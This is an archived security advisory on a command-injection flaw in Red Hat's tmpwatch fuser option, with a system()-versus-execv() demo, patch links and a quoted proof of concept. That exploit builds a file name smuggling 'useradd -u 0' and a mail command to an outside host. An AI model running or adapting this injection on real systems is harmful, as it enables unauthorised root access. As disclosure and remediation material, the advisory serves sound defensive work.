COMMAND
tmpwatch
SYSTEMS AFFECTED
tmpwatch 2.2, 2.5.1
PROBLEM
The following is based on an Internet Security Systems Security
Advisory. The tmpwatch utility is used in Red Hat Linux to remove
temporary files. It has an option to call the "fuser" program,
which checks whether a file is currently open in some process.
tmpwatch invokes fuser through the system() library routine,
which passes its argument to a shell. Because the file name is
inserted into that argument without being neutralized, an
attacker can get arbitrary commands executed.
This vulnerability may allow local attackers to gain superuser
privileges, but only if the administrator runs tmpwatch in a
non-default manner (with the fuser option).
Affected versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Use the 'rpm -q tmpwatch' command to verify which version is
installed. The tmpwatch package as well as the package containing
fuser are included in the default base installation. By default,
tmpwatch with the fuser option is not used in any package shipped
with the Red Hat distributions.
The tmpwatch tool removes files that have not been modified or
accessed within a specified amount of time. It was designed to
remove files securely, avoiding the typical race condition
vulnerabilities of such cleaners. System administrators usually
run it periodically (typically from cron) to remove old temporary
files from world-writable directories.
With the --fuser or -s option, tmpwatch avoids removing a file
that another process still has open. To do so it calls the
external program /sbin/fuser through the system() library routine,
passing the name of the file under examination as an argument.
system() spawns a shell (/bin/sh -c) to run the command line, and
the shell parses it. An attacker who can create a file in a
directory tmpwatch cleans can therefore choose a file name
containing shell metacharacters (';', '|', backquotes and so on);
when tmpwatch with the fuser option examines that file, the shell
executes the embedded commands with tmpwatch's privileges, which
is normally root.
Source code comparison between the Red Hat Linux 6.2 and 7.0
tmpwatch packages suggests this vulnerability was recognized and
a fix was attempted. However, the fix is incorrect, and the
vulnerability is still exploitable.
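The following is an added illustration, not code from the advisory or from tmpwatch itself: the system() pattern the advisory describes, beside a fork()/execv() replacement, run with /bin/echo standing in for /sbin/fuser and "x; exit 5" as a constructed hostile file name. The "fuser -s <name>" command shape and the metacharacter filter are assumptions made for this example; the advisory does not say what the 2.5.1 change actually filtered, the filter is here only to show why that layer is the wrong place for the fix.

```c
/* Added example (not tmpwatch's own code): the command-injection pattern
 * the advisory describes, beside the argv-based fix.  The "<fuser> -s <name>"
 * command shape is an assumption about how tmpwatch wired the call. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Turn a wait() status into an exit code, or -1 on failure/abnormal exit. */
static int exit_code(int st)
{
    if (st == -1 || !WIFEXITED(st))
        return -1;
    return WEXITSTATUS(st);
}

/* VULNERABLE: the file name is pasted into a command line that system()
 * hands to /bin/sh -c.  Any shell metacharacter in the name (';', '|',
 * '`', '$(...)', newline) is parsed by the shell, so a name such as
 * "x; exit 5" runs "exit 5" (or useradd, in the advisory's exploit). */
int fuser_via_system(const char *fuser, const char *name)
{
    char cmd[1024];
    int n = snprintf(cmd, sizeof cmd, "%s -s %s", fuser, name);
    if (n < 0 || n >= (int)sizeof cmd)
        return -1;
    return exit_code(system(cmd));
}

/* The partial-fix trap: rejecting a list of "bad" characters.  A denylist
 * like this is easy to get wrong (miss one character, the newline, or a
 * name starting with '-') and must be applied on every path; it is shown
 * here only as the kind of fix that stays fragile. */
int has_shell_meta(const char *name)
{
    return strpbrk(name, ";|&`$()<>\"'\\ \t\n*?[]{}~#!") != NULL;
}

/* HARDENED: fork + execv with an argv array.  No shell is involved, so the
 * name reaches fuser as one literal argument whatever it contains.
 * Callers should pass an absolute path (or "./name") so that a name
 * beginning with '-' cannot be taken as an option by fuser. */
int fuser_via_execv(const char *fuser, const char *name)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)fuser, "-s", (char *)name, NULL };
        execv(fuser, argv);
        _exit(127);             /* exec failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0)
        return -1;
    return exit_code(st);
}

int main(void)
{
    /* Constructed demo: /bin/echo stands in for /sbin/fuser so the example
     * runs on any box.  "x; exit 5" is the hostile file name. */
    const char *hostile = "x; exit 5";
    printf("system(): status %d (5 means the injected 'exit 5' ran)\n",
           fuser_via_system("/bin/echo", hostile));
    printf("execv():  status %d (0: the name was just an argument)\n",
           fuser_via_execv("/bin/echo", hostile));
    printf("filter flags hostile name: %d\n", has_shell_meta(hostile));
    return 0;
}
```

Compile with "cc -o demo demo.c" and run it. The system() variant reports status 5 because the shell executed the injected "exit 5" after echo; the execv() variant reports 0 because the same string reached echo as a single argument and was merely printed. Dropping the shell removes the parsing step altogether, which is why the fix belongs there rather than in a character filter.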
Here is a simple example, from Alexander Y. Yurchenko, of playing
with the tmpwatch bug:
1. Compile and run the following in /tmp. It creates a file whose
   name carries the injected commands (the code is Yurchenko's;
   only the missing include, the fclose() call and the return
   value have been corrected):
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        FILE *f;
        /* the ';' separators split the fuser command line into
           three shell commands: fuser, useradd and mail */
        char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com<blablabla";

        if ((f = fopen(filename, "a")) == NULL) {
            perror("Could not create file");
            exit(1);
        }
        fclose(f);
        return 0;
    }
2. cp /usr/sbin/adduser /tmp
3. Wait for the administrator's tmpwatch --fuser run to examine the
   file; the injected commands then execute with tmpwatch's (root)
   privileges, and the mail arriving confirms it.
SOLUTION
Do not use the --fuser or -s options with tmpwatch. Red Hat has
issued the following RPMs that contain fixes for this
vulnerability:
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
For ImmunixOS:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
SuSE reports that the tmpwatch packages shipped with its
distributions are not vulnerable to the attacks discussed on
security forums (discovered and initiated by zenith parsec).
All users of Trustix Secure Linux (TSL) should upgrade to the new RPM:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm